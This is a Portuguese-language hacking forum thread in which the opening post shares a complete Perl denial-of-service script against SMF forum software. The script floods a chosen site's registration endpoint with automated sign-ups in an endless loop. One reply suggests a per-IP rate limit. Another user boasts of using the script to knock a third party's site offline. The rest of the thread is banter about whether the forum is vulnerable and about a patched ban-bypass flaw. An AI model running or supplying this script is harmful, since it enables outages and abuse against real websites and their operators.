Exploit SMF DoS

Started by Anonymous, 10 de June , 2006, 09:17:05 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anonymous

Exploit para SMF, usa a técnica DoS. Normalmente usado para travamento do host.


#SMF DOS By Viran
#Attempts to Register Multiple Users on Desired SMF forum
#Works on Most Versions, cant tell you exact, did not experiment enough #to give affected versions.

use IO::Socket;

print "SMF Multiple User Registration DoS by viran\n\n";

print q(Enter a Host Name, ex www.host.com:
);
$host = <STDIN>;
chop ($host);

print q(Enter The Forum Directory ex /smf:
);
$dir = <STDIN>;
chop ($dir);

print q(Enter a Botname:
);
$bot = <STDIN>;
chop ($bot);


while($x != 999999999999999999999999999999999999)
{
$login ="$bot$x";

$email ="blank$x";

$sticky="user=$login&email=$email%40gg.com&passwrd1=password&passwrd2=password®agree=on®Submit=Register";
$lgth = length($sticky);


my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
) or die "Could Not Open a Socket \n Check the Desired Host You Entered, it may be dosed";

print $sock "POST $dir/index.php?action=register2 HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Accept-Language: en-us,en;q=0.5\n";
print $sock "Accept-Encoding: gzip,deflate\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
print $sock "Keep-Alive: 300\n";
print $sock "Connection: keep-alive\n";
print $sock "Referer: http://www.$host/smf/index.php?PHPSESSID=95e0352c6697ffe00a2e829231320f3e&action=register\n";
print $sock "Cookie: PHPSESSID=95e0352c6697ffe00a2e829231320f3e\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: $lgth\n";
print $sock "$sticky\n";
close($sock);
print".";
$x++
}

HadeS

Uma explicação básica cairia bem né?

O que esse exploit faz é simplesmente cadastrar vários user (999999999999999999999999999999999999 para ser mais exato).

Uma possível sol8ução é permitir que um IP cadastre somente um user por dia, ou algo assim.

HadeS

Shady



Mundus Vult Decipi

HadeS

Estou desenvolvendo um exploit para o SMF 1.1 RC2 e outras versões (Para falar a verdade está só nos papéis, mas não é coisa dificil, em breve estará pronto).

Ele se?a construído em C++.

E podem ficar tranqüilos, pois só vou disponibilizar depois de ter certeza que o Darkers não está vulnerável.

HadeS

slul

Quote from: "HadeS"Estou desenvolvendo um exploit para o SMF 1.1 RC2 e outras versões (Para falar a verdade está só nos papéis, mas não é coisa dificil, em breve estará pronto).

Ele se?a construído em C++.

E podem ficar tranqüilos, pois só vou disponibilizar depois de ter certeza que o Darkers não está vulnerável.

HadeS

eu usei esse xpl soh q pra phpbb pra tirar do ar o site do spynet =P

ele ficou pputo

Shady

Quote from: "HadeS"Estou desenvolvendo um exploit para o SMF 1.1 RC2 e outras versões (Para falar a verdade está só nos papéis, mas não é coisa dificil, em breve estará pronto).

Ele se?a construído em C++.

E podem ficar tranqüilos, pois só vou disponibilizar depois de ter certeza que o Darkers não está vulnerável.

HadeS

 Ele nao esta vulneravel :)


Mundus Vult Decipi

slul

Quote from: "Shady"
Quote from: "HadeS"Estou desenvolvendo um exploit para o SMF 1.1 RC2 e outras versões (Para falar a verdade está só nos papéis, mas não é coisa dificil, em breve estará pronto).

Ele se?a construído em C++.

E podem ficar tranqüilos, pois só vou disponibilizar depois de ter certeza que o Darkers não está vulnerável.

HadeS

 Ele nao esta vulneravel :)

Shady Shady  a maior falha de segurança eeh a sensação de segurança total


o mitnick flw algo +- assim =P

a acho q foi

"A maior vulnerabilidade é a sensação e ivulnerabilidade."

o Kra ainda nem fez o xpl tu jah fala q nao tah buged

Shady

#7
Acredite slul, o forum com certeza tem vulnerabilidades, assim como qualquer sistema.

 Mas esse exploit nao funciona no Darkers (nem nenhum outro documentado ate o momento).


Mundus Vult Decipi

Anonymous


HadeS

Shady, disse que estou desenvolvendo o exploit, como diz que não está vulnerável?

Até onde sei está sim. ;D

HadeS

Shady

Eu ja testei esse exploit no Darkers. Como eu pensava, nao funcionou.


Mundus Vult Decipi

slul

Quote from: "Shady"Eu ja testei esse exploit no Darkers. Como eu pensava, nao funcionou.

mas shady!

ele nao estah falando do xpl postado ele estah falando de um que estah desenvolvendo como vc testou se ele ainda tah criando?

loki!

=P
inteh

DarkGenesis

He he he...

Acho que ouve uma falha na comunicação aqui.

Acontece. ;)

Shady

Quote from: "slul"
Quote from: "Shady"Eu ja testei esse exploit no Darkers. Como eu pensava, nao funcionou.

mas shady!

ele nao estah falando do xpl postado ele estah falando de um que estah desenvolvendo como vc testou se ele ainda tah criando?

loki!

=P
inteh

 Sim, achei que estivesse falando do exploit que foi postado aqui.

 Ao mesmo tempo, se a falha explorada pelo exploit que esta sendo codado pelo HadeS e a falha causada pela confianca que o SMF tem na variavel global de ip remoto do php, tambem nao vai funcionar. Essa falha seria usada para passar por bans, atraves da modificacao de headers, mas ja foi corrigida.

 A nao ser que seja outra, ainda nao documentada :)


Mundus Vult Decipi

Anonymous

Se tiver algum bug no darkers,provavelmente no servidor apache !!

:. By ZeuS .: